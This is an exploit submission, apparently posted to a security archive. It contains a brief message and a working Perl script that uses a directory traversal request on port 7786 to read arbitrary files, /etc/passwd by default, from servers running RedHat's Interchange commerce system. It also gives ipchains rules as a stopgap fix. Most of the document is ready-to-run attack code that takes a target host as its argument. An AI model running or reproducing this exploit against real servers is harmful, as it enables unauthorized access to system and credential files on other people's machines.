int.exp.txt

`First off, great site ! I appreciate all the work you do.  
  
I just wanted to send in a quick and dirty perl script to retrieve any file from a server running RedHat's Interchange commerce system. The temp fix for this can be to use ipchains/iptables to block access to the port from outside the server.  
  
/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT  
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY  
  
Redhat knows about it and I haven't checked my bugtraq/vuln-dev/fulldiscloser addy's in a few days, so not sure if this is even public or not.. I did not discover it, I have however been using the below script as a way to test if the servers are vulnerable without having to telnet to each one. The is another version (final versiopn actually) that reads the 'targets' from a file, but that's just not really needed. anyone who needs that can add it in themselves..  
  
  
#!/usr/bin/perl  
#  
# [email protected]  
# http://n3t.net  
#  
# grabs the file $thashit from the remote server  
# using a gaping hole in RH's Interchange  
#  
################  
  
use Socket;  
  
$host=$ARGV[0];  
$port = 7786;  
$thashit= "/etc/passwd";  
  
$time = localtime(time);  
  
print "Trying to get $thashit from $host\n";  
  
$tcpval = getprotobyname('tcp');  
$serverIP = inet_aton($host);  
$serverAddr = sockaddr_in(80, $serverIP);  
$protocol_name = "tcp";  
  
$iaddr = inet_aton($host) || die print("Failed to find host: $host");  
$paddr = sockaddr_in($port, $iaddr) || die print("Something went wrong ... dieing...");  
$proto = getprotobyname('tcp') || die print("Unable to get protocol");  
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Failed to open socket: $!");  
connect(SOCK, $paddr) || die print("Unable to connect: $!");  
$submit = "GET /../../../../../../..$thashit\n\n";  
send(SOCK,$submit,0);  
@thedata=<SOCK>;  
#recv(SOCK, $thedata, 10000, undef);  
close (SOCK);  
  
foreach $lin(@thedata) {  
print "$lin";  
}  
  
print "\nEOF\n\n";  
  
  
`